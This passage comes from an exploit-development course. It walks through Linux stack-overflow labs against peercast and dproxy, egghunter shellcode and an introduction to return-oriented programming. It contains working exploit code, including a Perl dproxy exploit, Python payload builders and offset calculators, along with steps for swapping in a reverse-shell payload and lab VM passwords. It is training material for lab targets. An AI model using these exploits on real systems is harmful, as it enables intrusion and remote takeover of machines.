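              % (name, edx, eip, "inside the spray" if ok else "not mapped: crash"))
```

- With the 0x90 sled the second dereference reads 0x90909090 out of the sled and CALL jumps there, which is the 0x90909090 frame in the k output. With the 0x0c sled every dword read from the sled is a pointer back into the sled, so the chain stays inside sprayed memory and the bytes execute as or al,0Ch until the shellcode is reached.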
- ----------------------------------------------------------------------------------------------------------------
- ##################
- # Linux Exploits #
- ##################
- The target virtual machine for these labs can be downloaded from here:
- https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
- root: exploitlab
- user: exploitlab
- pass: exploitlab
- The attack scripts can be downloaded from here:
- https://s3.amazonaws.com/secureninja/files/peercast_skel.zip
- https://s3.amazonaws.com/secureninja/files/dproxy.zip
- https://s3.amazonaws.com/secureninja/files/asterisk.zip
- ######################################
- # Lab 1: Simple Linux Stack Overflow #
- ######################################
- Login to the asterisk VM with the username/password of (exploitlab/exploitlab)
- ---------------------------Type This-----------------------------------
- cat victim1.c
- gcc victim1.c -o victim1
- ./victim1 AAAAAAAAAAAAAAAAAAA
- ./victim1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- gdb -core core.xxxx
- info registers
- x/64x $esp
- quit
- /usr/local/sbin/peercast
- -open peercast1.py on the XP attack-
- python peercast1.py | nc asterisk-vm-ip 7144
- gdb -core core.xxxx
- info registers
- x/64x $esp
- quit
- /usr/local/sbin/peercast
- -open peercast2.py-
- python peercast2.py | nc asterisk-vm-ip 7144
- gdb -core core.xxxx
- info registers
- x/64x $esp
- quit
- - SSH into the Ubuntu Host (strategicsec:strategicsec) -
- cd /home/strategicsec/toolz/metasploit/tools/exploit
- Now we will run the pattern offset with ruby:
- ruby pattern_offset.rb 42306142
- and
- ruby pattern_offset.rb 61423161
- -----------------------------------------------------------------------
- Distance to EIP is 780
- Relative position of ESP 784
- Now to find a good JMP ESP address with msfelfscan
- ---------------------------Type This-----------------------------------
- cd /home/strategicsec/toolz/metasploit/
- ./msfelfscan -j ESP binaries/peercast_binary
- -----------------------------------------------------------------------
- 0x0808fb57 jmp esp <----- we will use this one!
- 0x0808fcc7 jmp esp
- 0x0808ffff jmp esp
- 0x08090057 jmp esp <----- we can't use this one: the address contains a null byte (0x00).
- 0x080901df jmp esp
- Now open and edit peercast3.py in notepad++ on our XP Host machine.
- pad_lenth = the distance to EIP
- ret_address = the jmp esp we are using
- ---------------------------Type This-----------------------------------
- python peercast3.py | nc asterisk-vm-ip 7144
- gdb -core core.xxxx
- info registers
- x/64x $eip
- x/10i $eip
- quit
- -----------------------------------------------------------------------
- Open peercast4.py in Notepad++ and replace the \xCC with our msf shellcode
- Linux IA32 Reverse Shell
- LHOST (Listening Host) – the IP of your XP host machine ipconfig /all
- LPORT (Listening Port) – chose a port to run your listener on
- Encoder: Alpha2
- ---------------------------Type This-----------------------------------
- nc -l -p 4321
- python peercast4.py | nc asterisk-vm-ip 7144
- -----------------------------------------------------------------------
- ##################################################################
- # Lab 2: Dealing with a lack of space for your shellcode problem #
- ##################################################################
- DPROXY EXPLOIT - DNS PROXY
- --------------------------
- SSH Login into your Asterisk VM as root
- root / asterisk
- Start dproxy
- /usr/local/sbin/dproxy
- DNS running on UDP port 53
- we will use netcat's UDP mode (-u) for the transport.
- ---------------------------Type This-----------------------------------
- python dproxy1.py | nc -u asterisk-vm-ip 53
- GDB COMMANDS
- gdb -core core.9999 -- load core files
- info registers -- inspect registers
- x/64x $reg -- examine memory at a particular register
- x/64x $esp -- examine memory at ESP
- q -- quit
- x/10i $eip -- disassemble 10 instructions beginning at EIP
- python dproxy1.py | nc -u 192.168.128.140 53
- gdb -core core.8888
- (gdb) info registers
- -----------------------------------------------------------------------
- eax 0xbf9c8c40 0xbf9c8c40
- ecx 0x184f 0x184f
- edx 0xbf9c7da8 0xbf9c7da8
- ebx 0x41414141 0x41414141
- esp 0xbf9c7c00 0xbf9c7c00
- ebp 0x41414141 0x41414141
- esi 0x41414141 0x41414141
- edi 0xbf9c8c40 0xbf9c8c40
- eip 0x41414141 0x41414141
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbf9c7c00: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c10: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c20: 0x41414141 0x41414141 0x41414141 0x2e414141
- 0xbf9c7c30: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c40: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c50: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c60: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c70: 0x41412e41 0x41414141 0x41414141 0x41414141
- 0xbf9c7c80: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7c90: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7ca0: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7cb0: 0x2e414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7cc0: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7cd0: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7ce0: 0x41414141 0x41414141 0x41414141 0x41414141
- 0xbf9c7cf0: 0x41414141 0x41412e41 0x41414141 0x41414141
- PATTERN
- ---------------------------Type This-----------------------------------
- python dproxy2.py | nc -u 192.168.128.140 53
- (gdb) info registers
- -----------------------------------------------------------------------
- eax 0xbf9c8c40 0xbf9c8c40
- ecx 0x184f 0x184f
- edx 0xbf9c7da8 0xbf9c7da8
- ebx 0x43377143 0x43377143
- esp 0xbf9c7c00 0xbf9c7c00
- ebp 0x30724339 0x30724339
- esi 0x71433871 0x71433871
- edi 0xbf9c8c40 0xbf9c8c40
- eip 0x432e7243 0x432e7243 <------ messed up EIP: the byte 0x2e ('.') never occurs in the pattern, so pattern_offset cannot find this value directly
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbf9c7c00: 0x72433272 0x34724333 0x43357243 0x72433672
- 0xbf9c7c10: 0x38724337 0x43397243 0x73433073 0x32734331
- 0xbf9c7c20: 0x43337343 0x73433473 0x36734335 0x43377343
- 0xbf9c7c30: 0x7343382e 0x30744339 0x43317443 0x74433274
- 0xbf9c7c40: 0x34744333 0x43357443 0x74433674 0x38744337
- 0xbf9c7c50: 0x43397443 0x75433075 0x32754331 0x43337543
- 0xbf9c7c60: 0x75433475 0x36754335 0x43377543 0x75433875
- 0xbf9c7c70: 0x30764339 0x43317643 0x76433276 0x34764333
- 0xbf9c7c80: 0x43357643 0x76433676 0x38764337 0x43397643
- 0xbf9c7c90: 0x77433077 0x32774331 0x43337743 0x77433477
- 0xbf9c7ca0: 0x36774335 0x4337772e 0x77433877 0x30784339
- 0xbf9c7cb0: 0x43317843 0x78433278 0x34784333 0x43357843
- 0xbf9c7cc0: 0x78433678 0x38784337 0x43397843 0x79433079
- 0xbf9c7cd0: 0x32794331 0x43337943 0x79433479 0x36794335
- 0xbf9c7ce0: 0x43377943 0x79433879 0x307a432e 0x43317a43
- 0xbf9c7cf0: 0x7a43327a 0x347a4333 0x43357a43 0x7a43367a
- Relative position of ESP
- [ESP] = 0x72433272 -> pattern offset 2077 bytes (the dword at ESP is clean, so use it instead of EIP)
- ret popped the overwritten return address and left ESP 4 bytes past it, so EIP is overwritten at offset 2077 - 4 = 2073 bytes
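- The two pattern_offset runs in Lab 1 (42306142 -> 780, 61423161 -> 784) and the [ESP]-based recovery just done for dproxy are the same computation. The Python below is an added example, not one of the course scripts: it regenerates the Metasploit cyclic pattern, looks a register value up in it (a value read from a register dump is an integer, so its bytes are reversed to little-endian before searching), and handles the dproxy case where EIP holds a mangled value (0x432e7243 contains 0x2e, which the pattern never produces) by listing the near-matches and confirming against the clean dword at ESP. The 4-byte ESP adjustment is how x86 ret works (ESP ends up just past the popped return address); the input values are the ones from this page.

```python
import string
import struct

PATTERN_MAX = 26 * 26 * 10 * 3   # 20280 bytes before the Aa0 triplets would repeat


def pattern_create(length=PATTERN_MAX):
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0...Zz9 (unique 3-byte triplets)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def _needle(value):
    """A register value (int) becomes its little-endian bytes; str/bytes are used as-is."""
    if isinstance(value, int):
        return struct.pack("<I", value)
    return value.encode() if isinstance(value, str) else bytes(value)


def pattern_offset(value):
    """Offset of value in the pattern, or None if it is not a clean pattern fragment."""
    idx = pattern_create().find(_needle(value))
    return None if idx < 0 else idx


def fuzzy_offsets(value):
    """All offsets where at most one of the four bytes differs from the pattern: the
    candidates when one byte was mangled in transit (dproxy's 0x2e). Several will match,
    so confirm against a clean register such as the dword at ESP."""
    needle, pat = _needle(value), pattern_create()
    return [i for i in range(len(pat) - 3)
            if sum(a != b for a, b in zip(pat[i:i + 4], needle)) <= 1]


def eip_offset_from_esp(esp_dword):
    """After ret pops the overwritten return address, ESP points 4 bytes past it,
    so the EIP offset is the offset of the dword at ESP minus 4."""
    esp_off = pattern_offset(esp_dword)
    return None if esp_off is None else esp_off - 4


if __name__ == "__main__":
    # Lab 1 (peercast): clean values straight from the register dump
    print("peercast EIP offset:", pattern_offset(0x42306142))        # 780
    print("peercast ESP offset:", pattern_offset(0x61423161))        # 784
    # Lab 2 (dproxy): EIP is mangled, the dword at ESP is clean
    print("dproxy EIP exact   :", pattern_offset(0x432e7243))        # None
    print("dproxy EIP fuzzy   :", fuzzy_offsets(0x432e7243))         # 2070, 2073, ..., 2097
    print("dproxy [ESP] offset:", pattern_offset(0x72433272))        # 2077
    print("dproxy EIP via ESP :", eip_offset_from_esp(0x72433272))   # 2073
```

- The fuzzy search returns ten candidates for the dproxy EIP (every Cr?C triplet boundary), and only the ESP-derived value 2073 is consistent with the clean dword at ESP; that is the reasoning behind the 2073 used in dproxy3.py.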
- dproxy3.py
- - confirm that we get EIP = 42424242
- - check the stack memory x/64x $esp
- ---------------------------Type This-----------------------------------
- (gdb) info registers
- -----------------------------------------------------------------------
- eax 0xbf9c8c40 0xbf9c8c40
- ecx 0x184f 0x184f
- edx 0xbf9c7df5 0xbf9c7df5
- ebx 0x41414141 0x41414141
- esp 0xbf9c7c00 0xbf9c7c00
- ebp 0x41414141 0x41414141
- esi 0x41414141 0x41414141
- edi 0xbf9c8c40 0xbf9c8c40
- eip 0x42424242 0x42424242
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbf9c7c00: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c7c10: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c7c20: 0xcccccccc 0xcccccccc 0xcccccccc 0x2ecccccc
- 0xbf9c7c30: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c40: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c50: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c60: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c70: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c80: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- NEXT STEP - GET INT3
- ---------------------------Type This-----------------------------------
- msfelfscan -j esp dproxy_binary
- -----------------------------------------------------------------------
- 0x0804a7ca push esp; ret <----- push esp followed by ret behaves like jmp esp; this is the $eip used in the exploit script below
- Core was generated by `/usr/local/sbin/dproxy'.
- Program terminated with signal 5, Trace/breakpoint trap.
- #0 0xbf9c7c01 in ?? ()
- ---------------------------Type This-----------------------------------
- (gdb) info registers
- -----------------------------------------------------------------------
- eax 0xbf9c8c40 0xbf9c8c40
- ecx 0x184f 0x184f
- edx 0xbf9c7df5 0xbf9c7df5
- ebx 0x41414141 0x41414141
- esp 0xbf9c7c00 0xbf9c7c00
- ebp 0x41414141 0x41414141
- esi 0x41414141 0x41414141
- edi 0xbf9c8c40 0xbf9c8c40
- eip 0xbf9c7c01 0xbf9c7c01
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $eip
- -----------------------------------------------------------------------
- 0xbf9c7c01: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c7c11: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c7c21: 0xcccccccc 0xcccccccc 0xcccccccc 0x2e2ecccc
- 0xbf9c7c31: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c41: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c51: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c61: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c71: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- 0xbf9c7c81: 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e 0x2e2e2e2e
- USING THE EGGHUNTER - DPROXY5
- [AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP | <---truncated
- | |
- 2073 ESP (2077)
- [AAAAAAAA.AAAAAA.AAAAAA....AAAA][ JMP ESP ][ EGGHUNTER NOP NOP NOP ... NOP NOP 50905090 50905090 SHELLCODE ]
- Failed to read a valid object file image from memory.
- Core was generated by `/usr/local/sbin/dproxy'.
- Program terminated with signal 5, Trace/breakpoint trap.
- #0 0xbf9c84d1 in ?? ()
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $eip
- -----------------------------------------------------------------------
- 0xbf9c84d1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c84e1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c84f1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8501: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8511: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8521: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8531: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8541: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8551: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8561: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8571: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8581: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c8591: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c85a1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c85b1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- 0xbf9c85c1: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
- REPLACE THE INT3 SHELLCODE WITH ALPHA2 ENCODED LINUX IA32 REVERSE SHELL
- EXPLOIT WHICH REACHES INT3
- --------------------------------------old perl version of the code------------------------------------------------------
- #!/usr/bin/perl
- binmode(STDOUT);
- $| = 1; # turn off output buffering
- $distance_to_eip = 2073; # replace this with distance to EIP
- $eip = 0x0804a7ca; # push esp; ret - dproxy binary
- # Linux egghunter taken from Skape's paper: walks memory one byte at a time and uses the
- # access(2) syscall to test whether a page is mapped before reading it (EFAULT = not mapped)
- $linux_egghunter =
- "\xBB\x90\x50\x90\x50". # mov ebx, 0x50905090 <-- this is the EGG tag (as a little-endian dword)
- "\x31\xC9". # xor ecx,ecx
- "\xF7\xE1". # mul ecx ; eax = edx = 0
- "\x66\x81\xCA\xFF\x0F". # next_page: or dx,0xfff ; jump to the last byte of the current page
- "\x42". # next_byte: inc edx
- "\x60". # pusha
- "\x8D\x5A\x04". # lea ebx,[edx+0x4] ; pathname argument for access()
- "\xB0\x21". # mov al,0x21 ; sys_access (33)
- "\xCD\x80". # int 0x80
- "\x3C\xF2". # cmp al,0xf2 ; -EFAULT: page not mapped, skip it
- "\x61". # popa
- "\x74\xED". # jz next_page
- "\x39\x1A". # cmp [edx],ebx ; first copy of the tag?
- "\x75\xEE". # jnz next_byte
- "\x39\x5A\x04". # cmp [edx+0x4],ebx ; second copy of the tag?
- "\x75\xE9". # jnz next_byte
- "\xFF\xE2"; # jmp edx ; found it, execute from the egg
- # The egg is the tag twice. Mind the byte order: the hunter compares little-endian dwords
- # against 0x50905090, i.e. the bytes 90 50 90 50. Written as below the bytes are 50 90 50 90,
- # so the match succeeds one byte early, on the last 0x90 of $nops followed by the egg. That is
- # why the NOPs in front of the egg must stay; the bytes executed from the landing point
- # (90 50 90 50 ...) are nop / push eax, which do no harm before the shellcode.
- $egg = "\x50\x90\x50\x90\x50\x90\x50\x90";
- $shellcode = "\xCC" x 500; # replace with the Alpha2-encoded Linux IA32 reverse shell
- $nops = "\x90" x 100; # 100 NOPS to place between egghunter and shellcode
- $buf = "";
- $buf .= "A" x $distance_to_eip;
- $buf .= pack("V", $eip);
- $buf .= $linux_egghunter;
- $buf .= $nops;
- $buf .= $egg;
- $buf .= $shellcode;
- print $buf;
- --------------------------------------old perl version of the code------------------------------------------------------
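- Whether the hunter finds the egg, and where exactly it jumps, can be replayed offline. The script below builds the same buffer as the Perl above and walks it the way the hunter does: one byte at a time, comparing two consecutive little-endian dwords against 0x50905090. It is an added example, not part of the course files: the egghunter bytes, the 2073-byte distance and the push esp; ret address are taken from this page, the 500 int3 bytes are the lab's stand-in for shellcode, and the second egg (90 50 90 50 ...) is the tag written in memory order, tried alongside the lab's egg to show the one-byte difference in where the hunter lands.

```python
import struct

EGG_TAG = 0x50905090   # value the hunter keeps in EBX (mov ebx, 0x50905090)

# Skape's Linux access(2) egghunter, byte for byte as in the Perl script above
EGGHUNTER = (b"\xBB\x90\x50\x90\x50" b"\x31\xC9" b"\xF7\xE1" b"\x66\x81\xCA\xFF\x0F" b"\x42"
             b"\x60" b"\x8D\x5A\x04" b"\xB0\x21" b"\xCD\x80" b"\x3C\xF2" b"\x61" b"\x74\xED"
             b"\x39\x1A" b"\x75\xEE" b"\x39\x5A\x04" b"\x75\xE9" b"\xFF\xE2")

LAB_EGG = b"\x50\x90\x50\x90\x50\x90\x50\x90"      # $egg exactly as the lab script writes it
LE_EGG = struct.pack("<II", EGG_TAG, EGG_TAG)       # the tag twice in memory order: 90 50 90 50 ...

DISTANCE_TO_EIP = 2073       # from the dproxy pattern work
RET_ADDR = 0x0804a7ca        # push esp ; ret in the dproxy binary
SHELLCODE = b"\xCC" * 500    # stand-in, as in the lab


def build_payload(egg, distance=DISTANCE_TO_EIP, ret=RET_ADDR, nop_count=100, shellcode=SHELLCODE):
    """Same layout as the Perl: pad, ret, hunter, NOPs, egg, shellcode. Returns (buf, egg_off)."""
    head = b"A" * distance + struct.pack("<I", ret) + EGGHUNTER + b"\x90" * nop_count
    return head + egg + shellcode, len(head)


def hunt(memory, tag=EGG_TAG):
    """Replay the hunter's search: advance one byte at a time (inc edx) and stop at the
    first offset where [edx] and [edx+4], read as little-endian dwords, both equal the tag.
    Requiring two copies is what stops the hunter from matching its own mov ebx immediate."""
    for off in range(len(memory) - 7):
        if struct.unpack_from("<II", memory, off) == (tag, tag):
            return off
    return None


def landing_report(egg):
    """Where the hunter jumps relative to the egg, and whether every byte it executes
    before reaching the shellcode is nop (0x90) or push eax (0x50)."""
    buf, egg_off = build_payload(egg)
    land = hunt(buf)
    shell_off = egg_off + len(egg)
    benign = land is not None and all(b in (0x90, 0x50) for b in buf[land:shell_off])
    return {"egg_off": egg_off, "landing": land,
            "delta": None if land is None else land - egg_off,
            "benign_prefix": benign}


if __name__ == "__main__":
    for name, egg in (("lab egg 50 90 50 90", LAB_EGG), ("LE egg  90 50 90 50", LE_EGG)):
        print(name, landing_report(egg))
```

- With the lab's egg the hunter lands one byte before the egg (on the last NOP), with the little-endian form it lands on the egg itself; both run only nop / push eax before the int3s, which is why the lab's version works. If the NOPs in front of the egg are ever dropped, or the egg is placed somewhere the hunter has to find on its own, use the little-endian form or the hunter walks straight past it.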
- ###############################################
- # Introduction to Return Oriented Programming #
- ###############################################
- ---------------------------Type This-----------------------------------
- victim2.c
- ---------
- make victim2
- ./victim2 AAAAAAAAAAAAA
- gdb victim2
- disassemble main
- -----------------------------------------------------------------------
- 0x080483c7 <+31>: push 0x4
- 0x080483c9 <+33>: push 0x3
- 0x080483cb <+35>: call 0x8048426 <add>
- We want to set a breakpoint in main() just before add is called.
- We want to inspect the calling frame for add():
- break *0x080483cb
- run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
- We are in main()
- - just before call add()
- - we want to look at the stack
- In GDB, you can find out the stack trace by the following commands:
- where
- backtrace
- bt
- ---------------------------Type This-----------------------------------
- (gdb) x/i $eip
- -----------------------------------------------------------------------
- => 0x80483cb <main+35>: call 0x8048426 <add>
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbffffa60: 0x00000003 0x00000004 0xbffffa88 0x0804846b
- ^^^^^^^^^^params^^^^^^^^^^
- stepi <------ single step
- where
- ---------------------------Type This-----------------------------------
- (gdb) where
- -----------------------------------------------------------------------
- #0 0x08048426 in add ()
- #1 0x080483d0 in main ()
- ---------------------------Type This-----------------------------------
- (gdb) x/64x $esp
- -----------------------------------------------------------------------
- 0xbffffa5c: 0x080483d0 0x00000003 0x00000004 0xbffffa88
- ^^^^^^^^^^ ^^^^^^^^^^ ^^^^^^^^^^
- saved return param param
- address (from
- add)
- THIS IS THE CALLING FRAME FOR add(3, 4)
- ---------------------------Type This-----------------------------------
- export EGG=`./frame1.py`
- gdb victim2
- (gdb) run $EGG
- -----------------------------------------------------------------------
- 0x80484a5 <__libc_csu_init+85>: pop ebx
- 0x80484a6 <__libc_csu_init+86>: pop esi
- 0x80484a7 <__libc_csu_init+87>: pop edi <------ POP/POP/RET
- 0x80484a8 <__libc_csu_init+88>: pop ebp
- 0x80484a9 <__libc_csu_init+89>: ret
- ---------------------------Type This-----------------------------------
- export EGG=`./frame2.py`
- gdb victim2
- run $EGG
- -----------------------------------------------------------------------
- x/100i 0x080483a8
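- The calling frame gdb showed for add(3, 4) is exactly what frame1.py and frame2.py have to fabricate on the overflowed stack: the address of add where the saved return address was, then a return address for add, then its two arguments. Chaining a second call needs a gadget that discards the arguments before returning, which is what the pop edi ; pop ebp ; ret at 0x080484a7 is for. The script below is an added example, not the course's frame1.py or frame2.py: the add and gadget addresses are those from this page, DISTANCE_TO_EIP is a placeholder to be set from your own victim2 crash, and nul_positions is there because argv (the `run $EGG` delivery) is a C string that stops at the first NUL byte, which small integer arguments such as 3 and 4 contain.

```python
import struct

ADD = 0x08048426                 # add() in victim2, from disassemble main
POP_POP_RET = (0x080484a7, 2)    # pop edi ; pop ebp ; ret in __libc_csu_init: (address, pops)
DISTANCE_TO_EIP = 76             # placeholder: bytes from buffer start to the saved EIP in victim2


def dword(v):
    return struct.pack("<I", v & 0xffffffff)


def single_frame(func, args, ret_after):
    """Frame as the called function sees it on entry: [func][ret_after][arg0][arg1]...
    func replaces the saved return address, so ret jumps to it; ret_after is where func
    itself returns (garbage such as 0x41414141 if one call is all you need)."""
    return dword(func) + dword(ret_after) + b"".join(dword(a) for a in args)


def chain(calls, final_ret=0x41414141):
    """Several calls in sequence. Each function returns into a pop^n ; ret gadget that
    discards its n arguments, leaving the next function's address on top of the stack."""
    out = b""
    for func, args, (gadget, pops) in calls:
        if pops != len(args):
            raise ValueError("gadget at %#x pops %d dwords, call has %d args"
                             % (gadget, pops, len(args)))
        out += dword(func) + dword(gadget) + b"".join(dword(a) for a in args)
    return out + dword(final_ret)


def payload(chain_bytes, distance=DISTANCE_TO_EIP):
    return b"A" * distance + chain_bytes


def nul_positions(buf):
    """Offsets of NUL bytes; a payload passed through argv is cut at the first one."""
    return [i for i, b in enumerate(buf) if b == 0]


def stack_view(chain_bytes):
    """The chain as x/Nx $esp shows it once ret has fired: one dword per entry."""
    return [struct.unpack_from("<I", chain_bytes, i)[0] for i in range(0, len(chain_bytes), 4)]


if __name__ == "__main__":
    one = single_frame(ADD, (3, 4), 0x41414141)                              # frame1.py style
    two = chain([(ADD, (3, 4), POP_POP_RET), (ADD, (5, 6), POP_POP_RET)])    # frame2.py style
    for name, c in (("add(3,4)", one), ("add(3,4); add(5,6)", two)):
        print(name, ["%08x" % d for d in stack_view(c)], "NULs at", nul_positions(payload(c)))
```

- Compare stack_view of the single frame with the x/64x $esp output above: the same three dwords (return address, 3, 4) that the real call to add left behind, only now with add's own address in front of them where the saved EIP used to be.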